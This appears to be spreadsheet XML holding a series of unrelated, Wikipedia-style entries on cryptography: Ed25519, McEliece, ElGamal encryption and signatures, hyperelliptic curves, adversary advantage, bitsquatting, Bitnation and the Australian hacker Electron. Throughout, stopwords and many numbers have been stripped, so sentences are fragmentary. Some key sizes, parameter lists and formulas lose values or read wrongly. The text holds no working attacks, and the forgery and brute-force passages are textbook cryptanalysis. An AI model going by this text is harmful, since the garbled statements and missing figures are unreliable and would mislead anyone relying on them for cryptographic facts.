{\displaystyle 4/5} whose {\displaystyle coordinate positive."positive" defined terms bit-encoding: "positive" coordinates even coordinates (least significant cleared) "negative" coordinates coordinates (least significant set) {\displaystyle sha-512, {\displaystyle b=256} .the curve {\displaystyle e(\mathbb _{q})} birationally equivalent montgomery curve known curve25519. equivalence performance original team optimized ed25519 x86-64 nehalem/westmere processor family. verification performed batches signatures even greater throughput. ed25519 intended provide attack resistance comparable quality 128-bit symmetric ciphers. public keys bits long signatures bits long. secure coding security features, ed25519 branch operations array indexing steps depend secret data, defeat many side channel attacks. like discrete-log-based signature schemes, eddsa uses secret value called nonce unique signature. signature schemes ecdsa, nonce traditionally generated randomly signature—and random number generator ever broken predictable making signature, signature leak private key, happened sony playstation firmware update signing key. contrast, eddsa chooses nonce deterministically hash part private message. thus, private generated, eddsa need random number generator order make signatures, danger broken random number generator used make signature reveal private key. standardization implementation inconsistencies note standardization efforts eddsa, ietf, informational 8032 nist part fips 186-5 (2019). differences standards analyzed, test vectors available. software notable uses ed25519 include openssh, gnupg various alternatives, signify tool openbsd. usage ed25519 (and ed448) protocol standardized. 2019 draft version fips 186-5 standard included deterministic ed25519 approved signature scheme. supercop reference implementation language inline assembler) slow concise alternate implementation, include side-channel attack protection (python) nacl libsodium cryptonote cryptocurrency protocol wolfssl i2pd implementation eddsa minisign minisign miscellanea macos virgil uses ed25519 keys default apple watch iphone ed25519 keys ikev2 mutual authentication botan dropbear since 2013.61test openssl 1.1.1 libgcrypt java development cardano ed448 ed448 eddsa signature scheme using shake256 curve448 defined 8032. also approved draft fips 186-5 standard. references external links ed25519 home page</t>
  </si>
  <si>
    <t>SECG</t>
  </si>
  <si>
    <t>cryptography, standards efficient cryptography group (secg) international consortium founded certicom 1998. group exists develop commercial standards efficient interoperable cryptography based elliptic curve cryptography (ecc). links documents secg home page elliptic curve cryptography (version superseded version 2.0) elliptic curve cryptography (version 2.0) recommended elliptic curve domain parameters (version superseded version recommended elliptic curve domain parameters (version 2.0) certicom patent letter also elliptic curve cryptography</t>
  </si>
  <si>
    <t>Bitstate hashing</t>
  </si>
  <si>
    <t>bitstate hashing hashing method invented 1968 morris. used state hashing, state (e.g. automaton) represented number passed hash function. result function taken index array bits bit-field), looks state already seen stores not. usually serves yes–no technique without need storing whole state representation. shortcoming framework losing precision like hashing techniques. hence tools technique hash function bit-field gets widened number used functions, row. even functions return values (the indices) point fields contents equal state uttered visited much higher probability. bitstate hashing utilized spin model checker deciding whether state already visited nested-depth-first search algorithm not. this purportedly memory savings case using hash function (175 hash functions used mb). state coverage dropped former case. references</t>
  </si>
  <si>
    <t>Efficient Probabilistic Public-Key Encryption Scheme</t>
  </si>
  <si>
    <t>epoc (efficient probabilistic public encryption) probabilistic public-key encryption scheme. epoc developed 1999 okamoto, uchiyama fujisaki labs japan. based random oracle model, primitive public-key encryption function converted secure encryption scheme truly random hash function; resulting scheme designed semantically secure chosen ciphertext attack. epoc's primitive encryption function (okamoto–uchiyama) function, invert function proven hard factoring composite integer public key. there three versions epoc: epoc-1 uses one-way trapdoor function random function (hash function); epoc-2 uses one-way trapdoor function, random functions (hash functions) symmetric-key encryption (e.g., one-time padding block-ciphers); epoc-3 uses okamoto–uchiyama one-way trapdoor function random functions (hash functions) well symmetric encryption scheme one-time pad, classical block cipher.epoc-1 designed distribution; epoc-2 epoc-3 designed distribution encrypted data transfer. also cryptography computational complexity theory okamoto–uchiyama cryptosystem references okamoto, uchiyama fujisaki (1999). "epoc: efficient probabilistic public-key encryption", contribution ieee describes epoc-1 epoc-2. okamoto pointcheval (2000). "epoc-3: efficient probabilistic public-key encryption (version 2)", contribution ieee describes epoc-3. okamoto; uchiyama (1998). public-key cryptosystem secure factoring. advances cryptology eurocrypt proceedings. lecture notes computer science. vol. 1403. 308–318. doi:10.1007/bfb0054135. isbn 978-3-540-64518-4.{{cite book}}: maint: multiple names: authors list (link)</t>
  </si>
  <si>
    <t>Bitsquatting</t>
  </si>
  <si>
    <t>bitsquatting form cybersquatting relies bit-flip errors occur process making request. these bit-flips occur factors faulty hardware cosmic rays. when error occurs, user requesting domain directed website registered domain name similar legitimate domain, except flipped respective binary representations. 2011 black paper detailed analysis eight legitimate domains targeted thirty bitsquat domains. over course seven months, 52,317 requests made bitsquat domains. references</t>
  </si>
  <si>
    <t>Hyperelliptic curve cryptography</t>
  </si>
  <si>
    <t>hyperelliptic curve cryptography similar elliptic curve cryptography (ecc) insofar jacobian hyperelliptic curve abelian group arithmetic, group points elliptic curve ecc. definition (imaginary) hyperelliptic curve genus {\displaystyle field {\displaystyle given equation {\displaystyle c:y^{2}+h(x)y=f(x)\in k[x,y]} {\displaystyle h(x)\in k[x]} polynomial degree larger {\displaystyle {\displaystyle f(x)\in k[x]} monic polynomial degree {\displaystyle 2g+1} from definition follows elliptic curves hyperelliptic curves genus hyperelliptic curve cryptography {\displaystyle often finite field. jacobian {\displaystyle denoted {\displaystyle j(c)} quotient group, thus elements jacobian points, equivalence classes divisors degree relation linear equivalence. this agrees elliptic curve case, shown jacobian elliptic curve isomorphic group points elliptic curve. hyperelliptic curves cryptography came 1989 neal koblitz. although introduced years ecc, many cryptosystems implement hyperelliptic curves implementation arithmetic efficient cryptosystems based elliptic curves factoring (rsa). efficiency implementing arithmetic depends underlying finite field {\displaystyle practice turns finite fields characteristic good choice hardware implementations software usually faster characteristic.the jacobian hyperelliptic curve abelian group serve group discrete logarithm problem (dlp). short, suppose abelian group {\displaystyle {\displaystyle element {\displaystyle {\displaystyle entails finding integer {\displaystyle given elements {\displaystyle namely {\displaystyle {\displaystyle g^{a}} first type group used multiplicative group finite field, later also jacobians (hyper)elliptic curves used. hyperelliptic curve chosen care, pollard's method efficient solve dlp. this means that, jacobian {\displaystyle elements, running time exponential {\displaystyle \log(n)} this makes possible jacobians fairly small order, thus making system efficient. hyperelliptic curve chosen poorly, become quite easy solve. case known attacks efficient generic discrete logarithm solvers even subexponential. hence hyperelliptic curves must avoided. considering various attacks dlp, possible list features hyperelliptic curves avoided. attacks generic attacks discrete logarithm problem finite abelian groups pohlig–hellman algorithm pollard's method used attack jacobian hyperelliptic curves. pohlig-hellman attack reduces difficulty looking order group working with. suppose group {\displaystyle used {\displaystyle n=p_{1}^{r_{1}}\cdots p_{k}^{r_{k}}} elements, {\displaystyle p_{1}^{r_{1}}\cdots p_{k}^{r_{k}}} prime factorization {\displaystyle pohlig-hellman reduces {\displaystyle dlps subgroups order {\displaystyle p_{i}} {\displaystyle i=1,...,k} {\displaystyle largest prime divisor {\displaystyle {\displaystyle hard solve subgroup order {\displaystyle therefore would like choose {\displaystyle largest prime divisor {\displaystyle {\displaystyle \#g=n} almost equal {\displaystyle itself. requiring {\displaystyle {\frac {n}{p}}\leq usually suffices. index calculus algorithm another algorithm used solve circumstances. jacobians (hyper)elliptic curves exists index calculus attack dlp. genus curve becomes high, attack efficient pollard's rho. today known even genus {\displaystyle g=3} cannot assure security. hence left elliptic curves hyperelliptic curves genus another restriction hyperelliptic curves comes menezes-okamoto-vanstone-attack frey-rück-attack. first, often called short, developed 1993, second came 1994. consider (hyper)elliptic curve {\displaystyle finite field {\displaystyle \mathbb _{q}} {\displaystyle power prime number. suppose jacobian curve {\displaystyle elements {\displaystyle largest prime divisor {\displaystyle {\displaystyle smallest positive integer {\displaystyle p|q^{k}-1} exists computable injective group homomorphism subgroup {\displaystyle j(c)} order {\displaystyle {\displaystyle \mathbb _{q^{k}}^{*}} {\displaystyle small, solve {\displaystyle j(c)} using index calculus attack {\displaystyle \mathbb _{q^{k}}^{*}} arbitrary curves {\displaystyle large (around size {\displaystyle q^{g}} even though index calculus attack quite fast multiplicative groups finite fields attack threat curves. injective function used attack pairing applications cryptography make them. applications important balance hardness {\displaystyle j(c)} {\displaystyle \mathbb _{q^{k}}^{*}} depending security level values {\displaystyle useful. subgroup {\displaystyle \mathbb _{q^{k}}^{*}} torus. there exists independent usage torus based cryptography. also problem, {\displaystyle largest prime divisor order jacobian, equal characteristic {\displaystyle \mathbb _{q}.} different injective could consider additive group {\displaystyle \mathbb _{q}} instead jacobian. however, additive group trivial solve, easily seen. also curves, called anomalous curves, used dlp. order jacobian hence, order choose good curve good underlying finite field, important know order jacobian. consider hyperelliptic curve {\displaystyle genus {\displaystyle field {\displaystyle \mathbb _{q}} {\displaystyle power prime number define {\displaystyle c_{k}} {\displaystyle field {\displaystyle \mathbb _{q^{k}}} shown order jacobian {\displaystyle c_{k}} lies interval {\displaystyle [({\sqrt {q}}^{k}-1)^{2g},({\sqrt {q}}^{k}+1)^{2g}]} called hasse-weil interval. more, compute order using zeta-function hyperelliptic curves. {\displaystyle a_{k}} number points {\displaystyle c_{k}} then define zeta-function {\displaystyle c=c_{1}} {\displaystyle z_{c}(t)=\exp(\sum _{i=1}^{\infty }{a_{i}{\frac {t^{i}}{i}}})} zeta-function shown {\displaystyle z_{c}(t)={\frac {p(t)}{(1-t)(1-qt)}}} {\displaystyle p(t)} polynomial degree {\displaystyle coefficients {\displaystyle \mathbb furthermore {\displaystyle p(t)} factors {\displaystyle p(t)=\prod _{i=1}^{g}{(1-a_{i}t)(1-{\bar {a_{i}}}t)}} {\displaystyle a_{i}\in \mathbb {\displaystyle i=1,...,g} here {\displaystyle {\bar {a}}} denotes complex conjugate {\displaystyle finally order {\displaystyle j(c_{k})} equals {\displaystyle \prod _{i=1}^{g}{|1-a_{i}^{k}|^{2}}} hence orders jacobians found computing roots {\displaystyle p(t)} references external links colm héigeartaigh implementation hyperelliptic curves algorithms using miracl</t>
  </si>
  <si>
    <t>Bitnation</t>
  </si>
  <si>
    <t>bitnation, cryptonation,: "voluntary nation" records vital records, identity legal events using blockchain technology. bitnation founded 2014 using ethereum smart contract technology. history bitnation founder susanne tarkowski tempelhof grew franco-swedish family father stateless decade. inspired blockchain technology bitcoin inspired extend education national security, gradually evolved backbone concepts modern startup company bitnation. bitnation founded july 2014 tempelhof.: media bitnation subject vice piece september 2016 wherein author noted "because nation much ideological concept legal one, strength bitnation lies ability give agency groups ignored repressed modern nation-states."the atlantic noted february 2018 "bitnation [is] proposing 'peer-to-peer voluntary governance system' replace arbitrariness birth decider one’s citizenship. blockchain governance could allow creation virtual citizenship autonomous communities distinct territorial nation-states."bitnation also received notable coverage economist wall street journal experimental work using blockchain technology solve migrant crisis. awards accolades april 2017, bitnation's brer (bitnation refugee emergency response) programme awarded grand prix 2017, annual netexplo forum prize co-organized unesco. references bibliographies googlement: do-it-yourself guide starting your nation (and changing world) (2014), susanne tarkowski tempelhof, nortia press (english) isbn 0988879859 swarmwise february 2013), rick falkvinge, chapter 1–6, english, online journal external links krug, joey. "bitnation public notary (bpn)". bitnation. retrieved september 2017. tarkowski tempelhof, susanne july 2015). "bitnation: year summary". medium. retrieved september 2017. tarkowski tempelhof, susanne; farrell, jason (2016). "bitnation whitepaper": retrieved september 2017. {{cite journal}}: cite journal requires |journal= (help)</t>
  </si>
  <si>
    <t>McEliece cryptosystem</t>
  </si>
  <si>
    <t>cryptography, mceliece cryptosystem asymmetric encryption algorithm developed 1978 robert mceliece. first scheme randomization encryption process. algorithm never gained much acceptance cryptographic community, candidate "post-quantum cryptography", immune attacks using shor's algorithm generally measuring coset states using fourier sampling.the algorithm based hardness decoding general linear code (which known np-hard). description private key, error-correcting code selected efficient decoding algorithm known, able correct {\displaystyle errors. original algorithm uses binary goppa codes (subfield codes geometric goppa codes genus-0 curve finite fields characteristic codes efficiently decoded, thanks algorithm patterson. public derived private disguising selected code general linear code. this, code's generator matrix {\displaystyle perturbated randomly selected invertible matrices {\displaystyle {\displaystyle (see below). variants cryptosystem exist, using different types codes. most proven less secure; broken structural decoding. mceliece goppa codes resisted cryptanalysis far. effective attacks known information-set decoding algorithms. 2008 paper describes attack fix. another paper shows quantum computing, sizes must increased factor four improvements information decoding.the mceliece cryptosystem advantages over, example, rsa. encryption decryption faster. long time, thought mceliece could used produce signatures. however, signature scheme constructed based niederreiter scheme, dual variant mceliece scheme. main disadvantages mceliece private public keys large matrices. standard selection parameters, public kilobits long. scheme definition mceliece consists three algorithms: probabilistic generation algorithm produces public private key, probabilistic encryption algorithm, deterministic decryption algorithm. users mceliece deployment share common security parameters: {\displaystyle n,k,t} generation principle alice chooses linear code {\displaystyle family codes knows efficient decoding algorithm, make {\displaystyle public knowledge keep decoding algorithm secret. such decoding algorithm requires knowing {\displaystyle sense knowing arbitrary generator matrix, requires know parameters used specifying {\displaystyle chosen family codes. instance, binary goppa codes, information would goppa polynomial code locators. therefore, alice publish suitably obfuscated generator matrix {\displaystyle more specifically, steps follows: alice selects binary {\displaystyle (n,k)} -linear code {\displaystyle capable (efficiently) correcting {\displaystyle errors large family codes, e.g. binary goppa codes. this choice give rise efficient decoding algorithm {\displaystyle also {\displaystyle generator matrix {\displaystyle linear code many generator matrices, often natural choice family codes. knowing would reveal {\displaystyle kept secret. alice selects random {\displaystyle k\times binary non-singular matrix {\displaystyle alice selects random {\displaystyle n\times permutation matrix {\displaystyle alice computes {\displaystyle k\times matrix {\displaystyle {\hat {g}}=sgp} alice's public {\displaystyle ({\hat {g}},t)} private {\displaystyle (s,p,a)} note {\displaystyle could encoded stored parameters used selecting {\displaystyle message encryption suppose wishes send message alice whose public {\displaystyle ({\hat {g}},t)} encodes message {\displaystyle binary string length {\displaystyle computes vector {\displaystyle c^{\prime }=m{\hat {g}}} generates random {\displaystyle -bit vector {\displaystyle containing exactly {\displaystyle ones vector length {\displaystyle weight {\displaystyle computes ciphertext {\displaystyle c=c^{\prime }+z} message decryption upon receipt {\displaystyle alice performs following steps decrypt message: alice computes inverse {\displaystyle (i.e. {\displaystyle p^{-1}} alice computes {\displaystyle {\hat {c}}=cp^{-1}} alice uses decoding algorithm {\displaystyle decode {\displaystyle {\hat {c}}} {\displaystyle {\hat {m}}} alice computes {\displaystyle m={\hat {m}}s^{-1}} proof message decryption note {\displaystyle {\hat {c}}=cp^{-1}=m{\hat {g}}p^{-1}+zp^{-1}=msg+zp^{-1}} {\displaystyle permutation matrix, thus {\displaystyle zp^{-1}} weight {\displaystyle goppa code {\displaystyle correct {\displaystyle errors, word {\displaystyle msg} distance {\displaystyle {\displaystyle cp^{-1}} therefore, correct code word {\displaystyle {\hat {m}}=ms} obtained. multiplying inverse {\displaystyle gives {\displaystyle m={\hat {m}}s^{-1}=mss^{-1}} plain text message. sizes mceliece originally suggested security parameter sizes 1024 {\displaystyle n=1024,k=524,t=50} resulting public size 524*(1024−524) 262,000 bits. recent analysis suggests parameter sizes 2048 1751 {\displaystyle n=2048,k=1751,t=27} bits security using standard algebraic decoding, 1632 1269 {\displaystyle n=1632,k=1269,t=34} using list decoding goppa code, giving rise public sizes 520,047 460,647 bits respectively. resiliency quantum computers, sizes 6960 5413 {\displaystyle n=6960,k=5413,t=119} goppa code proposed, giving size public 8,373,911 bits. round submission nist post quantum standardization highest level security, level given parameter sets 6688128, 6960119, 8192128. parameters 6688 {\displaystyle n=6688,k=128,t=13} 6960 {\displaystyle n=6960,k=119,t=13} 8192 {\displaystyle n=8192,k=128,t=13} respectively. attacks attack consists adversary, knows public {\displaystyle ({\hat {g}},t)} private key, deducing plaintext intercepted ciphertext {\displaystyle y\in \mathbb _{2}^{n}} such attempts infeasible. there main branches attacks mceliece: brute-force unstructured attacks attacker knows {\displaystyle {\hat {g}}} generator matrix {\displaystyle (n,k)} code {\displaystyle {\hat {c}}} combinatorially able correct {\displaystyle errors. attacker ignore fact {\displaystyle {\hat {c}}} really obfuscation structured code chosen specific family, instead algorithm decoding linear code. several algorithms exist, going codeword code, syndrome decoding, information decoding. decoding general linear code, however, known np-hard, however, above-mentioned methods exponential running time. 2008, bernstein, lange, peters described practical attack original mceliece cryptosystem, using information decoding method stern. using parameters originally suggested mceliece, attack could carried 260.55 operations. since attack embarrassingly parallel communication nodes necessary), carried days modest computer clusters. structural attacks attacker instead attempt recover "structure" {\displaystyle thereby recovering efficient decoding algorithm {\displaystyle another sufficiently strong, efficient decoding algorithm. family codes {\displaystyle chosen completely determines whether possible attacker. many code families proposed mceliece, completely "broken" sense attacks recover efficient decoding algorithm found, reed-solomon codes. originally proposed binary goppa codes remain suggested families codes largely resisted attempts devising structural attacks. post-quantum encryption candidate variant algorithm combined nts-kem entered selected second round nist post-quantum encryption competition. references external links alfred menezes; scott vanstone; menezes; paul oorschot (1996). "chapter public-key encryption". handbook applied cryptography. press. isbn 978-0-8493-8523-0."quantum computers? internet security code future cracked". science daily. eindhoven university technology. november 2008."classic mceliece". (submission nist post-quantum cryptography standardization project)</t>
  </si>
  <si>
    <t>ElGamal encryption</t>
  </si>
  <si>
    <t>cryptography, elgamal encryption system asymmetric encryption algorithm public-key cryptography based diffie–hellman exchange. described taher elgamal 1985. elgamal encryption used free privacy guard software, recent versions pgp, cryptosystems. digital signature algorithm (dsa) variant elgamal signature scheme, confused elgamal encryption. elgamal encryption defined cyclic group {\displaystyle like multiplicative group integers modulo security depends upon difficulty certain problem {\displaystyle related computing discrete logarithms. algorithm elgamal encryption consists three components: generator, encryption algorithm, decryption algorithm. generation first party, alice, generates pair follows: generate efficient description cyclic group {\displaystyle g\,} order {\displaystyle q\,} generator {\displaystyle {\displaystyle represent identity element {\displaystyle choose integer {\displaystyle randomly {\displaystyle \{1,\ldots ,q-1\}} compute {\displaystyle h:=g^{x}} public consists values {\displaystyle (g,q,g,h)} alice publishes public retains {\displaystyle private key, must kept secret. encryption second party, bob, encrypts message {\displaystyle alice public {\displaystyle (g,q,g,h)} follows: message {\displaystyle element {\displaystyle {\displaystyle using reversible mapping function. choose integer {\displaystyle randomly {\displaystyle \{1,\ldots ,q-1\}} compute {\displaystyle s:=h^{y}} this called shared secret. compute {\displaystyle c_{1}:=g^{y}} compute {\displaystyle c_{2}:=m\cdot sends ciphertext {\displaystyle (c_{1},c_{2})} alice.note knows ciphertext {\displaystyle (c_{1},c_{2})} plaintext {\displaystyle easily find shared secret {\displaystyle since {\displaystyle c_{2}\cdot m^{-1}=s} therefore, {\displaystyle hence {\displaystyle generated every message improve security. reason, {\displaystyle also called ephemeral key. decryption alice decrypts ciphertext {\displaystyle (c_{1},c_{2})} private {\displaystyle follows: compute {\displaystyle s:=c_{1}^{x}} since {\displaystyle c_{1}=g^{y}} {\displaystyle c_{1}^{x}=g^{xy}=h^{y}} thus shared secret used encryption. compute {\displaystyle s^{-1}} inverse {\displaystyle group {\displaystyle this computed several ways. {\displaystyle subgroup multiplicative group integers modulo {\displaystyle {\displaystyle prime, modular multiplicative inverse computed using extended euclidean algorithm. alternative compute {\displaystyle s^{-1}} {\displaystyle c_{1}^{q-x}} this inverse {\displaystyle lagrange's theorem, since {\displaystyle s\cdot c_{1}^{q-x}=g^{xy}\cdot g^{(q-x)y}=(g^{q})^{y}=e^{y}=e} compute {\displaystyle m:=c_{2}\cdot s^{-1}} this calculation produces original message {\displaystyle {\displaystyle c_{2}=m\cdot hence {\displaystyle c_{2}\cdot s^{-1}=(m\cdot s)\cdot s^{-1}=m\cdot e=m} {\displaystyle back plaintext message {\displaystyle practical like public systems, elgamal cryptosystem usually used part hybrid cryptosystem, message encrypted using symmetric cryptosystem, elgamal used encrypt symmetric key. this asymmetric cryptosystems like elgamal usually slower symmetric ones level security, faster encrypt message, arbitrarily large, symmetric cipher, elgamal encrypt symmetric key, usually quite small compared size message. security security elgamal scheme depends properties underlying group {\displaystyle well padding scheme used messages. computational diffie–hellman assumption (cdh) holds underlying cyclic group {\displaystyle encryption function one-way.if decisional diffie–hellman assumption (ddh) holds {\displaystyle elgamal achieves semantic security. semantic security implied computational diffie–hellman assumption alone. decisional diffie–hellman assumption discussion groups assumption believed hold. elgamal encryption unconditionally malleable, therefore secure chosen ciphertext attack. example, given encryption {\displaystyle (c_{1},c_{2})} (possibly unknown) message {\displaystyle easily construct valid encryption {\displaystyle (c_{1},2c_{2})} message {\displaystyle achieve chosen-ciphertext security, scheme must modified, appropriate padding scheme must used. depending modification, assumption necessary. other schemes related elgamal achieve security chosen ciphertext attacks also proposed. cramer–shoup cryptosystem secure chosen ciphertext attack assuming holds {\displaystyle proof random oracle model. another proposed scheme dhaes, whose proof requires assumption weaker assumption. efficiency elgamal encryption probabilistic, meaning single plaintext encrypted many possible ciphertexts, consequence general elgamal encryption produces expansion size plaintext ciphertext. encryption elgamal requires exponentiations; however, exponentiations independent message computed ahead time needed. decryption requires exponentiation computation group inverse, can, however, easily combined exponentiation. also taher elgamal, designer cryptosystems elgamal signature scheme homomorphic encryption further reading menezes; oorschot; vanstone. "chapter elgamal public-key encryption" (pdf). handbook applied cryptography. press. boneh (1998). decision diffie–hellman problem. lecture notes computer science. vol. 1423. 48–63. citeseerx 10.1.1.461.9971. doi:10.1007/bfb0054851. isbn 978-3-540-64657-0. references</t>
  </si>
  <si>
    <t>ElGamal signature scheme</t>
  </si>
  <si>
    <t>elgamal signature scheme digital signature scheme based difficulty computing discrete logarithms. described taher elgamal 1985.the elgamal signature algorithm rarely used practice. variant developed known digital signature algorithm much widely used. there several variants. elgamal signature scheme must confused elgamal encryption also invented taher elgamal. overview elgamal signature scheme digital signature scheme based algebraic properties modular exponentiation, together discrete logarithm problem. algorithm uses pair consisting public private key. private used generate digital signature message, signature verified using signer's corresponding public key. digital signature provides message authentication (the receiver verify origin message), integrity (the receiver verify message modified since signed) non-repudiation (the sender cannot falsely claim signed message). history elgamal signature scheme described taher elgamal 1985. operation scheme involves four operations: generation (which creates pair), distribution, signing signature verification. generation generation phases. first phase choice algorithm parameters shared different users system, second phase computes single pair user. parameter generation choose length {\displaystyle choose {\displaystyle -bit prime number {\displaystyle choose cryptographic hash function {\displaystyle output length {\displaystyle bits. {\displaystyle l&gt;n} leftmost {\displaystyle bits hash output used. choose generator {\displaystyle g&lt;p} multiplicative group integers modulo {\displaystyle z_{p}^{*}} .the algorithm parameters {\displaystyle (p,g)} these parameters shared users system. per-user keys given parameters, second phase computes pair single user: choose integer {\displaystyle randomly {\displaystyle \{1\ldots p-2\}} compute {\displaystyle y:=g^{x}{\bmod {p}}} {\displaystyle private {\displaystyle public key. distribution signer send public {\displaystyle receiver reliable, necessarily secret, mechanism. signer keep private {\displaystyle secret. signing message {\displaystyle signed follows: choose integer {\displaystyle randomly {\displaystyle \{2\ldots p-2\}} {\displaystyle relatively prime {\displaystyle p-1} compute {\displaystyle r:=g^{k}{\bmod {p}}} compute {\displaystyle s:=(h(m)-xr)k^{-1}{\bmod {(}}p-1)} unlikely event {\displaystyle s=0} start different random {\displaystyle .the signature {\displaystyle (r,s)} verifying signature verify signature {\displaystyle (r,s)} valid signature message {\displaystyle follows: verify {\displaystyle 0&lt;r&lt;p} {\displaystyle 0&lt;s&lt;p-1} signature valid {\displaystyle g^{h(m)}\equiv y^{r}r^{s}{\pmod {p}}.} correctness algorithm correct sense signature generated signing algorithm always accepted verifier. computation {\displaystyle signature generation implies {\displaystyle h(m)\,\equiv \,xr+sk{\pmod {p-1}}.} since {\displaystyle relatively prime {\displaystyle {\displaystyle {\begin{aligned}g^{h(m)}&amp;\equiv g^{xr+sk}{\pmod {p}}\\&amp;\equiv (g^{x})^{r}(g^{k})^{s}{\pmod {p}}\\&amp;\equiv (y)^{r}(r)^{s}{\pmod {p}}.\\\end{aligned}}} security third party forge signatures either finding signer's secret finding collisions hash function {\displaystyle h(m)\equiv h(m){\pmod {p-1}}} both problems believed difficult. however, 2011 tight reduction computational hardness assumption known. signer must careful choose different uniformly random signature certain even partial information leaked. otherwise, attacker able deduce secret reduced difficulty, perhaps enough allow practical attack. particular, messages sent using value key, attacker compute directly. existential forgery original paper include hash function system parameter. message used directly algorithm instead h(m). this enables attack called existential forgery, described section paper. pointcheval stern generalized case described levels forgeries: one-parameter forgery. select {\displaystyle {\displaystyle 1&lt;e&lt;p-1} {\displaystyle r:=g^{e}y{\bmod {p}}} {\displaystyle s:=-r{\bmod {(p-1)}}} then tuple {\displaystyle (r,s)} valid signature message {\displaystyle m=es{\bmod {(p-1)}}} two-parameters forgery. select {\displaystyle 1&lt;e,v&lt;p-1} {\displaystyle \gcd(v,p-1)=1} {\displaystyle r:=g^{e}y^{v}{\bmod {p}}} {\displaystyle s:=-rv^{-1}{\bmod {(p-1)}}} then tuple {\displaystyle (r,s)} valid signature message {\displaystyle m=es{\bmod {(p-1)}}} one-parameter forgery special case two-parameter forgery, {\displaystyle v=1} also modular arithmetic digital signature algorithm elliptic curve elgamal encryption schnorr signature pointcheval–stern signature algorithm references</t>
  </si>
  <si>
    <t>Advantage (cryptography)</t>
  </si>
  <si>
    <t>cryptography, adversary's advantage measure successfully attack cryptographic algorithm, distinguishing idealized version type algorithm. note context, "adversary" algorithm person. cryptographic algorithm considered secure adversary non-negligible advantage, subject specified bounds adversary's computational resources (see concrete security). "negligible" usually means "within o(2−p)" security parameter associated algorithm. example, might number bits block cipher's key. description concept oracle function studied, oracle idealized function type. adversary probabilistic algorithm, given input, outputs distinguish based making queries oracle given. say: {\displaystyle adv(a)=|\pr[a(f)=1]-\pr[a(g)=1]|} examples random instance block cipher. this cipher 64-bit blocks 56-bit key. therefore selects family permutations possible 64-bit blocks. "random instance" means oracle computes using (which unknown adversary) selected possible keys equal probability. want compare instance idealized 64-bit block cipher, meaning permutation selected random (264)! possible permutations 64-bit blocks. call randomly selected permutation note stirling's approximation (264)! around 3.47 {\displaystyle 10^{3.47\times 10^{20}}} even specifying permutation selected requires writing number large represent exactly real computer. viewed another way, instance "cipher" whose "key length" 1021 bits, large computer. can, however, implement storage space proportional number queries, using random oracle). note oracles given encrypt plaintext choosing, we're modelling chosen-plaintext attack cpa, advantage we're calculating called cpa-advantage given adversary. also decryption oracles available, we'd chosen-ciphertext attack finding cca-advantage adversary. example guess random call adversary simply flips coin returns equal probability without making oracle calls. thus, pr[a0(f)=1] pr[a0(g)=1] 0.5. difference probabilities zero, adv(a0) zero. thing applies always return always return probability advantage zero. this adversary can't tell apart. we're cipher designers, desire (maybe achievable) make computationally infeasible adversary significantly better this. succeeded make cipher there's distinguisher faster brute force search. example brute force search this adversary (call attempt cryptanalyze input brute force. implementation. gives single query oracle, asking 64-bit string zeroes encrypted. call resulting ciphertext runs exhaustive search. algorithm looks like this: oracle_query(0) 0,1,...,256-1: desk(0) return return this searches entire 56-bit keyspace returns probably finds matching key. practice, several plaintexts required confirm key, different keys result matching plaintext-ciphertext pairs. found, returns input oracle des, exhaustive search certain find key, pr[a1(f)=1] input oracle random permutation, possible values examined keysearch. probability returning 2−8. that {\displaystyle pr[a_{1}(g)=1]\leq 2^{-8}} {\displaystyle adv(a_{1})=|pr[a_{1}(f)=1]-pr[a_{1}(g)=1]|\geq 1-2^{-8}} advantage least 0.996. this near-certain distinguisher, security failure faster brute force search, all, brute force search. also pseudorandom-function advantage key-recovery advantage pr-cpa advantage references phillip rogaway mihir bellare, introduction modern cryptography oded goldreich, foundations cryptography</t>
  </si>
  <si>
    <t>Hyper-encryption</t>
  </si>
  <si>
    <t>hyper-encryption form encryption invented michael rabin uses high-bandwidth source public random bits, together secret shared sender recipient(s) message. uses assumptions ueli maurer's bounded-storage model basis secrecy. although everyone data, decryption adversaries without secret still feasible, space limitations storing enough data mount attack system. unlike almost cryptosystems except one-time pad, hyper-encryption proved information-theoretically secure, provided storage bound cannot surpassed. moreover, necessary public information cannot stored time transmission, plaintext shown impossible recover, regardless computational capacity available adversary future, even access secret future time. highly energy-efficient implementation hyper-encryption chip demonstrated krishna palem using probabilistic cmos pcmos technology shown ~205 times efficient terms energy-performance-product. also perfect forward secrecy randomness extractor references further reading ding rabin. hyper-encryption everlasting security. 19th annual symposium theoretical aspects computer science (stacs), volume 2285 lecture notes computer science, 1–26. springer-verlag, 2002. jason juang, practical implementation analysis hyper-encryption. masters dissertation, department electrical engineering computer science, 2009-05-22. external links chi-jen (18–22 august 2002). "hyper-encryption space-bounded adversaries on-line strong extractors". advances cryptology crypto '02, lecture notes computer science. springer-verlag. archived original 2015-04-29. {{cite journal}}: cite journal requires |journal= (help) dziembowski, stefan; maurer, ueli (may 2002). tight security proofs bounded-storage model (pdf). stoc proceedings thiry-fourth annual symposium theory computing. 341–350. doi:10.1145/509907.509960. isbn 978-1581134957. s2cid 11042024. archived original (pdf) 2017-07-06.&lt;/ref&gt; [1], video lecture professor michael rabin.</t>
  </si>
  <si>
    <t>Electron (computer hacker)</t>
  </si>
  <si>
    <t>electron computer handle richard jones, member underground hacker community called realm. jones, born june 1969, three members group arrested simultaneous raids australian federal police melbourne, australia, april 1990. three nahshon even-chaim (also known phoenix), electron (real name david john woodcock) convicted range computer crimes involving intrusion defense government computer systems theft online computer security newsletter late 1980s early 1990. significance case case first prosecution hackers australian federal computer crime legislation come june 1989. also first time world police gained conviction using evidence obtained remote tapping computer. weeks raid, members computer crime section capturing online activity ringleader, phoenix, suburban melbourne, police telephone intercept branch canberra, away. conversations electron nom, intercepted continuously eight weeks raid, formed basis evidence phoenix's co-offenders, freely discussed targets hacking bragged exploits. electron pleaded guilty offences june 1993 given suspended six-month jail sentence hours community service. media 1997 book suelette dreyfus, underground: tales hacking, madness obsession electronic frontier, described hackers' exploits; 2005 former computer crime investigator bill apro co-wrote book, hackers: hunt australia’s most infamous computer cracker told police investigation resulted arrest. three offenders named book. electron's story also told dramatised documentary, realm hackers, aired australia’s television 2003. also list convicted computer criminals references books dreyfus, suelette (1997). underground: tales hacking, madness obsession electronic frontier. mandarin. isbn 1-86330-595-5. (free electronic edition archived 2016-03-03 wayback machine) apro, bill; hammond, graeme (2005). hackers: hunt australia's most infamous computer cracker. five mile press. isbn 1-74124-722-5.newspapers hack future, sunday age, 2003. nailed master hacker, sunday herald sun, july 2005.magazines hackers 'plan revenge' police clampdown computer crime: extract scientist article arrest hackers, april 1990: [2]film 